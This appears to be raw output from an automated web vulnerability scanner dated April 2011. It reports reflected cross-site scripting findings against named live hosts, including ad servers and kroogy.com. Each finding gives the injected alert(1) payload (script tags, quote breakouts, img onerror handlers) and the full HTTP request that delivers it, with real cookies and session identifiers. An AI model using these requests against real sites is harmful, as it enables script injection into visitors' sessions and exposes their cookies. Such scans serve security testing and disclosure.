<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 20597%3B0-0%3B0%3B62289813%3B2321-160/600%3B41844251/41862038/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.14923c5b"-alert(1)-"62d3592bb19&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFl ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb328"-alert(1)-"9fe4dc0640 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1lseb328"-alert(1)-"9fe4dc0640&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=;ord=43369? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af3/f/191/%2a/k%3B240320597%3B0-0%3B0%3B62289813%3B2321-160/600%3B41844251/41862038/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1lseb328"-alert(1)-"9fe4dc0640&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEP ...[SNIP]...
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload ad34f<script>alert(1)</script>7e0dd690cc was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_289668ad34f<script>alert(1)</script>7e0dd690cc HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=3667F90C3D92533777E23512D2CC53A4; Path=/ ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 24 Apr 2011 12:29:28 GMT Connection: close
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload e96ed<script>alert(1)</script>bfcafa00f07 was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx Date: Sun, 24 Apr 2011 12:10:02 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 83
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 98ed0<script>alert(1)</script>82d8bb5aab2 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-6888065668292638%26output%3Dhtml%26h%3D600%26slotname%3D2465090616%26w%3D160%26ea%3D0%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fpub.retailer-amazon.net%252Fbanner_120_600_a.php%253Fsearch%253D%257B%2524keyword%257D%26dt%3D1303647951817%26bpp%3D4%26shv%3Dr20110414%26jsv%3Dr20110415%26correlator%3D1303647951838%26frm%3D1%26adk%3D2614322350%26ga_vid%3D2144667481.1303647952%26ga_sid%3D1303647952%26ga_hid%3D2004805199%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D-12245933%26bih%3D-12245933%26ifk%3D3901296887%26fu%3D4%26ifi%3D1%26dtd%3D26&uid=ZC45X9Axu6NOUFfX_28966898ed0<script>alert(1)</script>82d8bb5aab2&xy=0%2C0&wh=160%2C600&vchannel=69113&cid=166308&iad=1303647980799-33281526900827884&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888
The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1245f'-alert(1)-'7270a6fca4a was submitted in the cnd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ab?enc=UbgehetRD0BSuB6F61EPQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAmx_UNQAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303647972%29%3Buf%28%27c%27%2C+47580%2C+1303647972%29%3Buf%28%27r%27%2C+173254%2C+1303647972%29%3Bppv%288991%2C+%272648761091995253405%27%2C+1303647972%2C+1303691172%2C+47580%2C+25553%29%3B&cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..1245f'-alert(1)-'7270a6fca4a&referrer=http://pub.retailer-amazon.net/banner_120_600_a.php&pp=TbQW5AAFuF0K5TsMlgwlG6ulJHSvXriXqLC8qA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ_xgcc?/x+()3bsr'Cdow<veb?3Uv/UVYw=)_4D2ZjV3rbT=:l8]3^OkGzcVI6f^gvuV^I7ju^9f:I2>xky:`%sBTDqAUE0e56>F=_I^rRxXtls7eG1CflaNaIM'U.!TFd(icoIMFD8Eq<2pQLEEmmW8KJv/eZMYZ^UC6q``1N6p(m049Jmn`V9t>QhMj!HjDo6uf6G-(O-%mU+-jE%0BM#DUE%oZDSFs[C#jT6#4fpHXSw^4MSkbcW^kJHs5vG[(l?%GK2v+wIbLRbZpJZPWPCtBpj(f-%Uqi+C`pFa#KCPN5<uj90t1PzS3+VX?C
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 12:31:20 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 12:31:20 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 12:31:20 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG68%ErkX00s]#%2L_'x%SEV/i#+O:4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ`Be1]=6>9ihz-.bH-TwYBtaP2Z*7o9)NCI!IqN_21C4Nr5>oyW]]FlbwqoN3oN9Q[Ry.HV1loEoVkAa=QO!jG:cNKQi?NwxN+T84X=?B#oJ:g/9Y=s#M^w'=n'm1_EClIL>iuL`>)XwT?jd`+<zV!^5>9OHbQMHOGjU=yDoEKxAEZjL$$E[8VF_T1y`$R^fewUBXEHbOf)CrV(<9*nUGY%7uj)@9HgK.z!%#r!Kjs:Q'YOAI]f*J+>[/Bh/ce?bDXi/Si-1dp=y:2fw>PouZtY[Z5a<'%a=4=2#H)DhRBw#R0T!9v`THC)^>; path=/; expires=Sat, 23-Jul-2011 12:31:20 GMT; domain=.adnxs.com; HttpOnly Date: Sun, 24 Apr 2011 12:31:20 GMT Content-Length: 1533
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f4c9e<img%20src%3da%20onerror%3dalert(1)>0d6ca5ff0dc was submitted in the REST URL parameter 1. This input was echoed as f4c9e<img src=a onerror=alert(1)>0d6ca5ff0dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /favicon.icof4c9e<img%20src%3da%20onerror%3dalert(1)>0d6ca5ff0dc HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5289d<img%20src%3da%20onerror%3dalert(1)>704a0bea83e was submitted in the REST URL parameter 1. This input was echoed as 5289d<img src=a onerror=alert(1)>704a0bea83e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /index5289d<img%20src%3da%20onerror%3dalert(1)>704a0bea83e/livesearch&q=s&type=web HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 84a7e<img%20src%3da%20onerror%3dalert(1)>70c18f09796 was submitted in the REST URL parameter 2. This input was echoed as 84a7e<img src=a onerror=alert(1)>70c18f09796 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /index/livesearch84a7e<img%20src%3da%20onerror%3dalert(1)>70c18f09796&q=s&type=web HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 83857<img%20src%3da%20onerror%3dalert(1)>5428059cf9b was submitted in the REST URL parameter 1. This input was echoed as 83857<img src=a onerror=alert(1)>5428059cf9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /index83857<img%20src%3da%20onerror%3dalert(1)>5428059cf9b/livesearch&q=si&type=web HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c18b9<img%20src%3da%20onerror%3dalert(1)>e9c49ce397c was submitted in the REST URL parameter 2. This input was echoed as c18b9<img src=a onerror=alert(1)>e9c49ce397c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /index/livesearchc18b9<img%20src%3da%20onerror%3dalert(1)>e9c49ce397c&q=si&type=web HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 44c9f<img%20src%3da%20onerror%3dalert(1)>230c1568b68 was submitted in the REST URL parameter 1. This input was echoed as 44c9f<img src=a onerror=alert(1)>230c1568b68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /index44c9f<img%20src%3da%20onerror%3dalert(1)>230c1568b68/livesearch&q=sit&type=web HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a288e<img%20src%3da%20onerror%3dalert(1)>085eb934534 was submitted in the REST URL parameter 2. This input was echoed as a288e<img src=a onerror=alert(1)>085eb934534 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /index/livesearcha288e<img%20src%3da%20onerror%3dalert(1)>085eb934534&q=sit&type=web HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e8181<img%20src%3da%20onerror%3dalert(1)>1e804ed95f7 was submitted in the REST URL parameter 1. This input was echoed as e8181<img src=a onerror=alert(1)>1e804ed95f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /indexe8181<img%20src%3da%20onerror%3dalert(1)>1e804ed95f7/livesearch&q=site&type=web HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2bfbe<img%20src%3da%20onerror%3dalert(1)>6d8fdcd1241 was submitted in the REST URL parameter 2. This input was echoed as 2bfbe<img src=a onerror=alert(1)>6d8fdcd1241 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /index/livesearch2bfbe<img%20src%3da%20onerror%3dalert(1)>6d8fdcd1241&q=site&type=web HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 11056<img%20src%3da%20onerror%3dalert(1)>15604bb1f75 was submitted in the REST URL parameter 1. This input was echoed as 11056<img src=a onerror=alert(1)>15604bb1f75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /index11056<img%20src%3da%20onerror%3dalert(1)>15604bb1f75/livesearch&q=site:&type=web HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5be1c<img%20src%3da%20onerror%3dalert(1)>192451da902 was submitted in the REST URL parameter 2. This input was echoed as 5be1c<img src=a onerror=alert(1)>192451da902 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /index/livesearch5be1c<img%20src%3da%20onerror%3dalert(1)>192451da902&q=site:&type=web HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38cc5<img%20src%3da%20onerror%3dalert(1)>2e38d3282c6 was submitted in the REST URL parameter 1. This input was echoed as 38cc5<img src=a onerror=alert(1)>2e38d3282c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
